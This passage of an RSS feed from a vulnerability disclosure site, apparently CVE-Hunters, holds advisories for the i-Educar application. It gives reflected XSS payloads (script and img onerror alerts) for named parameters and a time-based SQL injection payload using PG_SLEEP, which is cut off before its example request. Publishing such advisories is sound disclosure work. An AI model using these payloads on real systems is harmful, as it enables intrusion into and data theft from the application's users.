&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC-Tipo&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10074/image.png&amp;#34;
	width=&amp;#34;968&amp;#34;
	height=&amp;#34;556&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10074/image_hu_ec3ebce9e8efdcbd.png 480w, /p/cve-2025-10074/image_hu_29ddd785c353a757.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;174&amp;#34;
		data-flex-basis=&amp;#34;417px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10074.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10074.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 07 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10099</title>
        <link>https://www.cvehunters.com/p/cve-2025-10099/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-10099/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10099-multiples-cross-site-scripting-xss-reflected-in-endpoint-educar_usuario_cadphp&amp;#34;&amp;gt;CVE-2025-10099: Multiples Cross-Site Scripting (XSS) Reflected in endpoint &amp;lt;code&amp;gt;educar_usuario_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10099&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10099&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_usuario_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;email&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;data_inicial&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;data_expiracao&amp;lt;/code&amp;gt; parameters.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;educar_usuario_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;email&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;data_inicial&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;data_expiracao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application reflects this input directly in the response. Although the server applies sanitization before storing the data or returning it later, the payload is executed immediately in the victim’s browser upon reflection, allowing an attacker to run arbitrary JavaScript in the user’s session.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10099-multiples-cross-site-scripting-xss-reflected-in-endpoint-educar_usuario_cadphp&amp;#34;&amp;gt;CVE-2025-10099: Multiples Cross-Site Scripting (XSS) Reflected in endpoint &amp;lt;code&amp;gt;educar_usuario_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10099&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10099&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_usuario_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;email&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;data_inicial&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;data_expiracao&amp;lt;/code&amp;gt; parameters.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;educar_usuario_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;email&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;data_inicial&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;data_expiracao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application reflects this input directly in the response. Although the server applies sanitization before storing the data or returning it later, the payload is executed immediately in the victim’s browser upon reflection, allowing an attacker to run arbitrary JavaScript in the user’s session.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payloads&amp;#34;&amp;gt;Payloads:
&amp;lt;/h3&amp;gt;&amp;lt;h4 id=&amp;#34;parameter-email&amp;#34;&amp;gt;Parameter &amp;lt;code&amp;gt;email&amp;lt;/code&amp;gt;
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;XSS-PoC-Email&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;parameters-data_inicial-and-data_expiracao&amp;#34;&amp;gt;Parameters &amp;lt;code&amp;gt;data_inicial&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;data_expiracao&amp;lt;/code&amp;gt;
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;3E%3Cimg%20src%3Dx%20onerror%3Dalert(&amp;amp;#39;XSS-PoC3&amp;amp;#39;)%3E
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10099/image.png&amp;#34;
	width=&amp;#34;1222&amp;#34;
	height=&amp;#34;534&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10099/image_hu_bf03398d0321c99e.png 480w, /p/cve-2025-10099/image_hu_ca402a023729493e.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;228&amp;#34;
		data-flex-basis=&amp;#34;549px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10099.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10099.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 07 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10011</title>
        <link>https://www.cvehunters.com/p/cve-2025-10011/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-10011/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10011-sql-injection-blind-time-based-vulnerability-in-id-parameter-on-moduletabelaarredondamentoedit-endpoint&amp;#34;&amp;gt;CVE-2025-10011: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;/module/TabelaArredondamento/edit&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10011&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10011&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;/module/TabelaArredondamento/edit&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10011-sql-injection-blind-time-based-vulnerability-in-id-parameter-on-moduletabelaarredondamentoedit-endpoint&amp;#34;&amp;gt;CVE-2025-10011: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;/module/TabelaArredondamento/edit&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10011&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10011&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;/module/TabelaArredondamento/edit&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/module/TabelaArredondamento/edit&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#39;&#43;AND&#43;7097=(SELECT&#43;7097&#43;FROM&#43;PG_SLEEP(5))&#43;AND&#43;&amp;amp;#39;WqeR&amp;amp;#39;=&amp;amp;#39;WqeR
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;example-request&amp;#34;&amp;gt;Example Request
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
